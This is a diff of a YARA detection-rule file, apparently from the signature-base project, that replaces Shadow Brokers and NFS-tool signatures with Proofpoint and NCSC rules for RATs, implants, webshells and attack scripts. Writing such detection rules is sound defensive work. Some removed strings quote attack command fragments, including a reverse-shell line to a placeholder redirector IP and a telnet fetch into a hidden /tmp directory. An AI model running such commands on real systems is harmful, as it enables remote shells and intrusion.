-		hash1 = "967facb19c9b563eb90d3df6aa89fd7dcfa889b0ba601d3423d9b71b44191f50"
+		hash1 = "16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5"
 
 	strings:
-		$x1 = "echo -n TARGET_HOSTNAME  | sed '/\\n/!G;s/\\(.\\)\\(.*\\n\\)/&\\2\\1/;//D;s/.//'" fullword ascii
+		$s1 = "UpdateService.tmp" fullword ascii
+		$s2 = "StateNum:%d,FileSize:%d" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "22021985de78a48ea8fb82a2ff9eb693" or pe.exports ( "WinCred" ) or all of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Elgingamble
+rule SIGNATURE_BASE_APT_IN_TA397_Wmrat : HUNTING
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.elgingamble.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "344e5d5e-9fd6-5a32-ba98-945f5a35a116"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L275-L288"
+		description = "track wmRAT based on socket usage, odd error handling, and reused strings"
+		author = "Proofpoint"
+		id = "c5855b30-3e75-570f-b327-498dfc382159"
+		date = "2024-11-20"
+		modified = "2025-01-17"
+		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta397_dec24.yar#L2-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2f4dd668c59244e92ebfe0e2fc2859b2376cf1dd6fc6522e8f452787aa96365f"
+		hash = "3bf4bbd5564f4381820fb8da5810bd4d9718b5c80a7e8f055961007c6f30da2b"
+		hash = "3e9a08972b8ec9c2e64eeb46ce1db92ae3c40bc8de48d278ba4d436fc3c8b3a4"
+		hash = "40ddb4463be9d8131f363fd78e21d9de5d838a3ec4044526aea45a473d6ddd61"
+		hash = "4836cb7eed0b20da50acb26472f918b180917101c026ce36074e0e879b604308"
+		hash = "4e3e4d476810c95c34b6f2aa9c735f8e57e85e3b7a97c709adc5d6ee4a5f6ccc"
+		hash = "5ab76cf85ade810b7ae449e3dff8a19a018174ced45d37062c86568d9b7633f9"
+		hash = "811741d9df51a9f16272a64ec7eb8ff12f8f26794368b1ff4ad5d30a1f4bb42a"
+		hash = "b588a423b826b57dce72c9ab58f89be2ddc710a0367ed0eed001c047d8bef32a"
+		hash = "caf871247b7256945598816e9c5461d64b6bdb68a15ff9f8742ca31dc00865f8"
+		logic_hash = "b20a13b87f4b81e7ebc10ff2f6203aeab46980e0d481bad786695339dd59bf7a"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4130284727ddef4610d63bfa8330cdafcb6524d3d2e7e8e0cb34fde8864c8118"
+		tags = "HUNTING"
+		category = "hunting"
+		malfamily = "wmRAT"
+		version = "1.0"
 
 	strings:
-		$x2 = "### Local exploit for" fullword ascii
+		$code_sleep_loop = {
+            6a 64              // push    0x64
+            ff d6              // call    esi
+            6a 01              // push    0x1
+            e8 ?? ?? ?? ??     // call    operator new
+            83 c4 04           // add     esp, 0x4
+            3b c7              // cmp     eax, edi
+
+        }
+		$code_error_handling = {
+            88 19           // mov     byte [ecx], bl
+            4a              // dec     edx
+            41              // inc     ecx
+            47              // inc     edi
+            4e              // dec     esi
+            85 d2           // test    edx, edx
+            ?? ??           // jne     0x401070
+            5f              // pop     edi {__saved_edi}
+            49              // dec     ecx
+            5e              // pop     esi {__saved_esi}
+            b8 7a 00 07 80  // mov     eax, 0x8007007a
+
+        }
+		$code_socket_recv_parsing = {
+            // 8b 15 20 55 41 00   mov     edx, dword [data_415520]
+            6a 00              // push    0x0
+            b8 04 00 00 00     // mov     eax, 0x4
+            2b c6              // sub     eax, esi
+            50                 // push    eax {var_10_1}
+            8d 0c 3e           // lea     ecx, [esi+edi]
+            51                 // push    ecx {var_14_1}
+            52                 // push    edx {var_18_1}
+            ff ??              // call    ebx
+            83 f8 ff           // cmp     eax, 0xffffffff
+            ?? ??              // je      0x4082e3
+            03 f0              // add     esi, eax
+            83 fe 04           // cmp     esi, 0x4
+          }
+		$str1 = "-.-.-." ascii
+		$str2 = "PATH" ascii
+		$str3 = "Path=" ascii
+		$str4 = "https://microsoft.com" ascii
+		$str5 = "%s%ld M" ascii
+		$str6 = "%s%ld K" ascii
+		$str7 = "%s(%ld)" ascii
+		$str8 = "RFOX" ascii
+		$str9 = "1llll" ascii
+		$str10 = "%d result(s)" ascii
+		$str11 = "%s%ld MB" ascii
+		$str12 = "%s%ld KB" ascii
+		$str13 = "%.1f" ascii
+		$str14 = "%02d-%02d-%d %02d:%02d" ascii
 
 	condition:
-		1 of them
+		uint16be( 0x0 ) == 0x4d5a and ( 2 of ( $code* ) or 10 of ( $str* ) )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_README_Cup
+rule SIGNATURE_BASE_SUSP_RAR_NTFS_ADS : HUNTING FILE
 {
 	meta:
-		description = "Auto-generated rule - file README.cup.NOPEN"
-		author = "Florian Roth (Nextron Systems)"
-		id = "876f3d99-cc6d-568a-a202-1b4938436303"
-		date = "2016-12-17"
+		description = "Detects RAR archive with NTFS alternate data stream"
+		author = "Proofpoint"
+		id = "ca2b5904-b3d3-53cd-a973-6f30f0831a94"
+		date = "2024-12-17"
+		modified = "2025-01-17"
+		reference = "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta397_dec24.yar#L82-L110"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "bcca4771e8f940ce8cfcff08284545fec6163df549e1fb589d89ca3fa335f04c"
+		score = 70
+		quality = 83
+		tags = "HUNTING, FILE"
+		category = "hunting"
+		hash1 = "feec47858379c29300d249d1693f68dc085300f493891d1a9d4ea83b8db6e3c3"
+		hash2 = "53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1"
+
+	strings:
+		$rar_magic = {52 61 72 21}
+		$ads = {
+                 03         // Header Type -> Service Header
+                 23         // Header flags
+                 [17-20]    // Flags and extra data area
+                 00         // Windows
+                 03         // Length of name = STM = 3
+                 53 54 4d   // STM NTFS alternate data stream
+                 [1-2]      // variable int (vint) for size of the stream name -> 1-2 bytes should be enough to take into account
+                 07         // Data type = Service data = Service header data array
+                 3a         // Start of the ADS name -> start with colon ":"
+               }
+		$neg = "Zone.Identifier"
+
+	condition:
+		$rar_magic at 0 and $ads and not $neg in ( @ads [ 1 ] .. @ads [ 1 ] + 15 )
+}
+rule SIGNATURE_BASE_Bytes_Used_In_AES_Key_Generation : FILE
+{
+	meta:
+		description = "Detects Backdoor.goodor"
+		author = "NCSC"
+		id = "26a549dd-cbd2-5abc-8d9d-5ea354d0ece8"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L290-L304"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L9-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd05a23ce29be88c1a459358c984e1317cf56d21e5b378624af644fb2b41931d"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "221f5ea0a0224a96588912e7ddfbafd20b0b10c119395ca14d1138c284d7b79e"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "98aaad31663b89120eb781b25d6f061037aecaeb20cf5e32c36c68f34807e271"
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$s3 = "-F file(s)   Full path to target's \"fuser\" program." fullword ascii
-		$s4 = "done after the RAT is killed." fullword ascii
+		$a1 = {35 34 36 35 4B 4A 55 54 5E 49 55 5F 29 7B 68 36 35 67 34 36 64 66 35 68}
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $a* )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Nopen_Oneshot
+rule SIGNATURE_BASE_Partial_Implant_ID : FILE
 {
 	meta:
-		description = "Auto-generated rule - file oneshot.example"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6a6b5426-f559-5668-a2ed-982801933302"
-		date = "2016-12-17"
+		description = "Detects implant from NCSC report"
+		author = "NCSC"
+		id = "15144f4a-2c96-57f0-b7e9-adbac477c38a"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L306-L319"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L24-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19aa32aafaaccc6697bbaff642d996554eccf2261d23071cfb8599ea0eea628b"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "d0a29bed3c19007cb08427769918b0a02d5d247211a1ceaff31aed5839c78966"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a85b260d6a53ceec63ad5f09e1308b158da31062047dc0e4d562d2683a82bf9a"
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$s1 = "/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet" ascii
+		$a1 = {38 38 31 34 35 36 46 43}
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Earlyshovel
+rule SIGNATURE_BASE_Sleep_Timer_Choice : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.earlyshovel.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d2640f9f-8934-5095-9c30-f24941685c9e"
-		date = "2016-12-17"
+		description = "Detects malware from NCSC report"
+		author = "NCSC"
+		id = "c64db0dd-2858-5508-ac51-d3318113a060"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L321-L334"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L39-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "396810b439ac53f393ad37a8acbd7236f8325730c75c1a6339e4c6343ecade7a"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "5d2b656aabb113c50805d4af0faa62f579547dd4ec328ff2778fab64d778b8b9"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "504e7a376c21ffbfb375353c5451dc69a35a10d7e2a5d0358f9ce2df34edf256"
+		tags = "FILE"
 
 	strings:
-		$x1 = "--tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT" ascii
+		$a1 = {8b0424b90f00000083f9ff743499f7f98d420f}
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Envisioncollision
+rule SIGNATURE_BASE_User_Function_String
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.envisioncollision.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a738e270-a3ea-5d38-8933-797d1bd9036a"
-		date = "2016-12-17"
+		description = "Detects user function string from NCSC report"
+		author = "NCSC"
+		id = "563ac6af-6b37-53c6-ae13-d97e31edb088"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L336-L352"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L54-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36b2a20ef3a6540a686d7f52c8c885842fd84ba7c7daa74c21e241e25826030e"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "04821d1d5c12b5a9aca3c5b4be9f7a7d35320ad1503ccbdadebc7710c613a976"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f04f078a8f0fdfc864d3d2e37d123f55ecc1d5e401a87eccd0c3846770f9e02"
 
 	strings:
-		$x1 = "-i<IP> -p<port> -U<user> -P<password> -D<directory> -c<commands>" fullword ascii
-		$x2 = "sh</dev/tcp/REDIR_IP/SHELL_PORT>&0" fullword ascii
-		$x3 = "-n ENVISIONCOLLISION" ascii
-		$x4 = "-UADMIN -PPASSWORD -i127.0.0.1 -Dipboard" fullword ascii
+		$a2 = "e.RandomHashString"
+		$a3 = "e.Decode"
+		$a4 = "e.Decrypt"
+		$a5 = "e.HashStr"
+		$a6 = "e.FromB64"
 
 	condition:
-		1 of them
+		4 of ( $a* )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme1
+rule SIGNATURE_BASE_Generic_Shellcode_Downloader_Specific : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1f5e3ab1-e0d1-589e-8c18-60c4ad07ee6e"
-		date = "2016-12-17"
+		description = "Detects Doorshell from NCSC report"
+		author = "NCSC"
+		id = "ddd25add-ff84-5106-ac3c-5d5b4c1ef2a9"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L356-L372"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L73-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "171d3df191e5c9ae4a4afc3a878cc25548238046b8c4c52dbb9ca4431aae45b0"
+		hash = "b8bc0611a7fd321d2483a0a9a505251e15c22402e0cfdc62c0258af53ed3658a"
+		logic_hash = "9315ad03b5a28030c32fea5547db3ae421a1ebdae0b96a8a4c2f92660c41bc40"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
-		hash2 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
-		hash3 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
+		quality = 79
+		tags = "FILE"
 
 	strings:
-		$x1 = "ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10" fullword ascii
+		$push1 = {68 6C 6C 6F 63}
+		$push2 = {68 75 61 6C 41}
+		$push3 = {68 56 69 72 74}
+		$a = {BA 90 02 00 00 46 C1 C6 19 03 DD 2B F4 33 DE}
+		$b = {87 C0 81 F2 D1 19 89 14 C1 C8 1F FF E0}
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3C ) ) == 0x4550 ) and ( $a or $b ) and @push1 < @push2 and @push2 < @push3
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme2
+rule SIGNATURE_BASE_Batch_Script_To_Run_Psexec
 {
 	meta:
-		description = "Auto-generated rule - from files user.tool.orleansstride.COMMON, user.tool.curserazor.COMMON"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5959d881-2989-582c-abe2-48c76ce0e995"
-		date = "2016-12-17"
+		description = "Detects malicious batch file from NCSC report"
+		author = "NCSC"
+		id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L374-L389"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L91-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb68c415d64d1db3d4bb0f4ad994bd050cb2287e4dc7b3ac57549f818a7914d8"
+		hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
+		logic_hash = "9bdaa14aa535c178914f83c12b23484162f085c6fc6041d379268546ee99f462"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
-		hash2 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
 
 	strings:
-		$x1 = "#####  Upload the encrypted phone list as awk, modify each parser command to have the" fullword ascii
+		$ = "Tokens=1 delims=" ascii
+		$ = "SET ws=%1" ascii
+		$ = "Checking %ws%" ascii
+		$ = "%TEMP%\\%ws%ns.txt" ascii
+		$ = "ps.exe -accepteula" ascii
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme3
+rule SIGNATURE_BASE_Batch_Powershell_Invoke_Inveigh
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41cfbf66-fb7d-5815-939f-06b23dfae746"
-		date = "2016-12-17"
+		description = "Detects malicious batch file from NCSC report"
+		author = "NCSC"
+		id = "c5dab029-6515-5d58-9ccd-bf438ba692d5"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L391-L411"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L109-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "968ec80f26750ac734ad9e296b5afb35867f6c53de1e88f7c8af78daeac24b61"
+		hash = "0a6b1b29496d4514f6485e78680ec4cd0296ef4d21862d8bf363900a4f8e3fd2"
+		logic_hash = "5048a180df301707622e9ad0b949da9e39d2f55f16fc43e7344a8181596a836c"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
-		hash2 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
-		hash3 = "3fe78949a9f3068db953b475177bcad3c76d16169469afd72791b4312f60cfb3"
-		hash4 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
-		hash5 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
-		hash6 = "89748906d1c574a75fe030645c7572d7d4145b143025aa74c9b5e2be69df8773"
-		hash7 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
 
 	strings:
-		$s3 = ":%s/CRYPTKEY/CRYPTKEY/g" fullword ascii
+		$ = "Inveigh.ps1" ascii
+		$ = "Invoke-Inveigh" ascii
+		$ = "-LLMNR N -HTTP N -FileOutput Y" ascii
+		$ = "powershell.exe" ascii
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme4
+rule SIGNATURE_BASE_Lnk_Detect : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files violetspirit.README, violetspirit.README"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9e84e4ab-f74a-59e5-aee2-408a68cd673f"
-		date = "2016-12-17"
+		description = "Detects malicious LNK file from NCSC report"
+		author = "NCSC"
+		id = "76d382f3-b2f2-5ede-94b2-5ae8b766c194"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L413-L429"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L126-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c19c77d7e7e26e01a9a50fd67cc0a7fd05069def878bf18726c3e115df307cb2"
+		logic_hash = "ae8796877d70f8ddd56bac8ed474231f26d9bc8e73625e65d5d927ab804996b3"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
-		hash2 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
+		tags = "FILE"
 
 	strings:
-		$s1 = "[-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5" fullword ascii
-		$s5 = "[-n tcp_port]    : default use portmapper to determine" fullword ascii
+		$lnk_magic = {4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46}
+		$lnk_target = {41 00 55 00 54 00 4F 00 45 00 58 00 45 00 43 00 2E 00 42 00 41 00 54}
+		$s1 = {5C 00 5C 00 31 00}
+		$s2 = {5C 00 5C 00 32 00}
+		$s3 = {5C 00 5C 00 33 00}
+		$s4 = {5C 00 5C 00 34 00}
+		$s5 = {5C 00 5C 00 35 00}
+		$s6 = {5C 00 5C 00 36 00}
+		$s7 = {5C 00 5C 00 37 00}
+		$s8 = {5C 00 5C 00 38 00}
+		$s9 = {5C 00 5C 00 39 00}
 
 	condition:
-		1 of them
+		uint32be( 0 ) == 0x4c000000 and uint32be( 4 ) == 0x01140200 and ( ( $lnk_magic at 0 ) and $lnk_target ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NFS_Fuse_NFS
+rule SIGNATURE_BASE_RDP_Brute_Strings
 {
 	meta:
-		description = "Detects the nfs-security-tooling fuse_nfs by HvS Consulting"
-		author = "Moritz Oettle"
-		id = "287fbe7d-ee1c-58a4-aa2d-9d9bec8321b4"
-		date = "2024-10-22"
-		modified = "2025-03-20"
-		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_HvS_nfs_security_tooling.yar#L1-L24"
+		description = "Detects RDP brute forcer from NCSC report"
+		author = "NCSC"
+		id = "d6f0cdbc-a910-5826-b25a-61c2924f8e2a"
+		date = "2018-04-06"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L151-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bd3714b865d77660404e5f3ed1e9c7b55aadc6f58d16761111be57597784686"
+		hash = "8234bf8a1b53efd2a452780a69666d1aedcec9eb1bb714769283ccc2c2bdcc65"
+		logic_hash = "80c51d82a57271409d298b5175505c4234a6c3ec8a8763c93b669d1f0a8d59ba"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "NFS3ConnectionFactory" fullword ascii
-		$s2 = "fuse_to_nfs_timestamp" fullword ascii
-		$s3 = "--manual-fh" fullword ascii
-		$s4 = "--fake-uid-allow-root" fullword ascii
-		$s5 = "nfs.rpc.credential" fullword ascii
-		$s6 = "nfs.readlink" fullword ascii
-		$s7 = "pyfuse3.EntryAttributes" fullword ascii
-		$s8 = "Make nested exports on NetApp servers work" fullword ascii
-		$s9 = "add_mutually_exclusive_group" fullword ascii
+		$ = "RDP Brute" ascii wide
+		$ = "RdpChecker" ascii
+		$ = "RdpBrute" ascii
+		$ = "Brute_Count_Password" ascii
+		$ = "BruteIPList" ascii
+		$ = "Chilkat_Socket_Key" ascii
+		$ = "Brute_Sync_Stat" ascii
+		$ = "(Error! Hyperlink reference not valid.)" wide
+		$ = "BadRDP" wide
+		$ = "GoodRDP" wide
+		$ = "@echo off{0}:loop{0}del {1}{0}if exist {1} goto loop{0}del {2}{0}del \"{2}\"" wide
+		$ = "Coded by z668" wide
 
 	condition:
 		4 of them
 }
-rule SIGNATURE_BASE_HKTL_NFS_NFS_Analyze
+rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_1
 {
 	meta:
-		description = "Detects the nfs-security-tooling nfy_analyze by HvS Consulting"
-		author = "Marc Stroebel"
-		id = "3350d0ae-e638-5c8f-a578-ba0ac5521053"
-		date = "2024-10-22"
-		modified = "2025-03-20"
-		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_HvS_nfs_security_tooling.yar#L26-L53"
+		description = "Detects Z Webshell from NCSC report"
+		author = "NCSC"
+		id = "f4b50760-bd3a-5e1f-bf32-50f16a42c381"
+		date = "2018-04-06"
+		modified = "2023-12-05"
+		old_rule_name = "Z_WebShell"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ncsc_report_04_2018.yar#L176-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "83a9e5b5b404bf28b0334611fe4f38227212783cecea3c9996d23cb00cad42ed"
+		hash = "ace12552f3a980f1eed4cadb02afe1bfb851cafc8e58fb130e1329719a07dbf0"
+		logic_hash = "1dfc546a7493c1443527ebe74ed8cd2b06ee032b9a3f736b830e16288e616d43"
 		score = 75
